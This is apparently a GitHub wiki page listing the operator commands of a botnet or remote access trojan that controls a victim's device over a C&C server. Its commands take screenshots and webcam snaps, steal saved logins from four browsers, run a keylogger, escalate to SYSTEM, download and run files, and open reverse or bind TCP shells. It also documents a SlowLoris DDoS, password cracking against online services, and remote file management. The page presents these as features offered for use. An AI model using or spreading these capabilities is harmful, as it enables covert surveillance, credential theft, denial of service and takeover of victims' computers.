-
Notifications
You must be signed in to change notification settings - Fork 4
Server Commands
AlMA PRO LEADER edited this page Jul 25, 2017
·
4 revisions
It's not that much of a different between those commands and the APSSH and IRC ones.
Even though the CPanel has buttons on it for those (plus we've explained most of them :|), we're going to list them:
- DSS: Desktop Screen-Shot: This one needs no explanation.
- goodbye: Obviously tells the bot to breakup with you :')
- wcs: Web-Cam Snap.
- logins: Sends all logins found in all four browsers (Chrome, Firefox, Safari and Opera).
- idle: How long has the user been idle?
- enlogger: Enable KeyLogger.
- dislogger: Disable KeyLogger.
- logs: Send both logs (KeyLogs (in case of default keylogger) and error logs).
- gh: Get Higher: Get higher than this level of privileges. Goes up to SYSTEM.
- cwt: Change Wait Time: Change the time bots wait before connecting again to the C&C server.
- df: Download file: Takes a URL as a parameter and downloads it in the current working directory.
- x: Executes a file. It takes (-cmd) as the first parameter if you want to run it in CMD, otherwise, the first parameter is the file.
- rcmd: Remote CMD. We recommend Be Shell over TCP.
- update: Takes the new file URL as a parameter.
- btcp: Bind TCP: A command to try and bind a
porton the victim's device. Takes only port as parameter to try it publicaly or (-l) as the first parameter and theportas the second to try it locally. [Ex: btcp 55]/[Ex: btcp -l 55] - rtcp: Reverse TCP: Takes one parameter HOST|PORT. Notice we use (|) mark not (:). [Ex: rtcp somehost|55]
- sl: SlowLoris: This is a DDoS attack for
Hyper Text Transfer Protocol(HTTP(S)) services. Takes (-b) as the first parameter to work in the background, otherwise the bot will never connect back to use unless if you tell it over IRC. - co: CrackOff: A cracking function that cracks
Onlineservices. It works on SMTP(S), IMAP(S), FTP, SSH (Currently down Check this), HTTP(S)[GET|POST]. Takes varies parameters count. Some services take host, port,username and password list, Others take more, hence, HTTP(S)[GET|POST]. It takes URL path and the request form if usingPOSTmethod. - fman: File Manager: This one has alot of sub ones! There they are:
- ref: Refresh: Sends a fresh list of files and folders that are in the current working directory.
- cd: We all know what that is.
- df: Download a file.
- uf: Upload a file.
- x: As above so below.
- del: Delete a file.
- mkdir: Make a directory.
- ren: Rename a file.
- touch: Make a file.
The above sub commands and the fman command are used as follows:
fman ref
fman cd DESTINATION
fman df URL
fman uf LOCAL_FILE|LOCAL_DIRECTORY. In case of directory, upload all files.
fman x [-cmd] FILE
fman del FILE
fman mkdir DIRECTORY_NAME
fman ren FILE|NEW_NAME. Make sure you use (|) to separate them.
fman touch FILE. If file already exists, skip the command.